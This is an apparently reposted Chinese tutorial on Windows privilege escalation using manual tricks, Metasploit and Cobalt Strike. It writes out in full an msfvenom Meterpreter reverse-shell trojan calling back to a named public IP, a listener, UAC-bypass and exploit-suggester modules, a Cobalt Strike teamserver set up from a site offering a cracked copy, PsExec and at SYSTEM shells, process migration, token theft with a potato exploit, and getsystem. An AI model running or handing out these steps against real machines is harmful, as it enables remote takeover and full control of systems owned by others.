权限提升WIN篇(腾讯云,CS,MSF)

溢出漏洞

信息收集

操作系统版本 ver,systeminfo
漏洞补丁信息 systeminfo
操作系统位数 systeminfo
杀软防护 tasklist /svc
网络 netstat -ano,ipconfig
当前权限 whoami

权限提升WIN篇(腾讯云,CS,MSF)_第1张图片

筛选EXP

根据前面的信息收集中的系统版本,位数和补丁情况筛选出合适的EXP

提权

根据EXP,可以选择手工操作,基于CS的半自动操作,基于MSF的全自动操作

如果提权中遇到无法执行命令的情况,可以尝试上传cmd.exe来执行

手工

可以根据GitHub上的工具和公开的利用脚本进行渗透

MSF(搭建在云服务器)

在云服务器搭建msf的目的,因为我们进行渗透测试的目标不可能只在靶机,我们需要一个公网IP来完成,此外,云服务器需要开启相应的端口,否则不能收到反弹shell

权限提升WIN篇(腾讯云,CS,MSF)_第2张图片

我的服务器是腾讯云宝塔版本,还要关闭宝塔防火墙或者开启相应端口

权限提升WIN篇(腾讯云,CS,MSF)_第3张图片

在/opt下搭建msf命令

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall

使用msf生成木马

msfvenom -p windows/meterpreter/reverse_tcp lhost=43.139.79.52 lport=7777 -f exe -o test.exe

开启msf监听模块,模块的设置应与生成的木马一致

msfconsole

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 0.0.0.0

set lport 7777

run

通过拿到的shell上传并执行木马

权限提升WIN篇(腾讯云,CS,MSF)_第4张图片

权限提升WIN篇(腾讯云,CS,MSF)_第5张图片 需要说的是,由于没有经过免杀处理,防火墙,杀毒软件等都会导致不能成功获得反弹shell

获得shell后,下一步就是利用msf来进行提权操作

 background  将界面切换到后台,记住session id

use post/multi/recon/local_exploit_suggester  使用msf的提权模块

show options 

set session 2

run

 

 选择可用的漏洞模块,直接利用提权

use exploit/windows/local/bypassuac_fodhelper

 show options 

set session 2

run

CS

我的云服务器默认是没有Java环境的,所以还要先搭建Java环境

java环境搭建

yum安装 openjdk11

yum install -y java-11-openjdk

安装位置默认为/usr/lib/jvm/,修改目录名

mv -v java-11-openjdk-11.0.12.0.7-0.el8_4.x86_64 jdk11

修改配置文件

vim /etc/profile


将光标移动到最后,在后面添加

export JAVA_HOME=/usr/lib/jvm/jdk11
export JRE_HOME=${JAVA_HOME}/jre
export CLASSPATH=.:$JAVA_HOME/lib/dt.jar:$JAVA_HOME/lib/tools.jar:$JRE_HOME/lib
export PATH=$PATH:$JAVA_HOME/bin:$JRE_HOME/bin


立即生效

source /etc/profile


检测是否安装成功

java -version

CS搭建
 

这是我下载CS4.8破解版本的网站

您正搜索 CS - 雨苁ℒ (ddosi.org)

权限提升WIN篇(腾讯云,CS,MSF)_第6张图片

如图,CS是一个多人协同的渗透工具,分为客户端和服务端,服务端可以有多个,多个攻击者连接在一个服务器上,共享攻击资源和目标信息,且拥有各种强大的功能 

服务端搭建

上传CS到云服务器,这里用使用宝塔面板上传的方式

权限提升WIN篇(腾讯云,CS,MSF)_第7张图片

 cd CobaltStrike4.8_www.ddosi.org/

cd Server/

chmod +x teamserver 

./teamserver 43.139.79.52 yc    ip为云主机IP,yc为连接密码 

 如图,CS服务端搭建成功

客户端搭建

权限提升WIN篇(腾讯云,CS,MSF)_第8张图片

运行cobaltstrike-client.cmd,连接远程服务端,搭建成功

权限提升WIN篇(腾讯云,CS,MSF)_第9张图片

权限提升WIN篇(腾讯云,CS,MSF)_第10张图片

at提权(win2003)

win2003中可以采用计划任务的方式进行提权,以普通用户的权限开启一个计划任务,system执行这个计划任务,就获取了system的权限

at 17:00 /interactive cmd

PsExec提权(win08,12,16)

PsExec.exe -accepteula -s -i -d cmd

权限提升WIN篇(腾讯云,CS,MSF)_第11张图片 ,

 MSF进程迁移注入(Win08,12,16)

通过msf拿到权限后,可以尝试migrate进程迁移,将进程迁移到拥有高权限的用户,实现提权的目的,这种方式利用系统的特性,不用上传文件,不会被杀毒软件等察觉

ps 查看进程

migrate PID 迁移到目标进程

令牌窃取 

令牌就是系统的临时密钥,相当于账户名和密码,原来决定是否允许这次请求和判断是属于哪一个用户的,他允许你不提供密码或其他凭证的前提下访问网络和系统资源

getuid    查看当前用户

use incognito   使用令牌窃取模块

list_tokens -u   列出可用的令牌

impersonate_token 目标令牌   窃取目标令牌

whoami  查看当前用户

低权限用户可以借助烂土豆配合令牌窃取实现提权

 execute -cH -f ./potato.exe

use incognito 

list_tokens -u 

impersonate_token

这里实际是利用烂2土豆这个溢出漏洞 ,使我们可以利用低权限来进行令牌窃取

msf直接提权 

msf是一款强大的渗透测试工具,可以使用getsystem直接提权

getsystem

你可能感兴趣的:(安全,腾讯云,云原生,网络安全,web安全)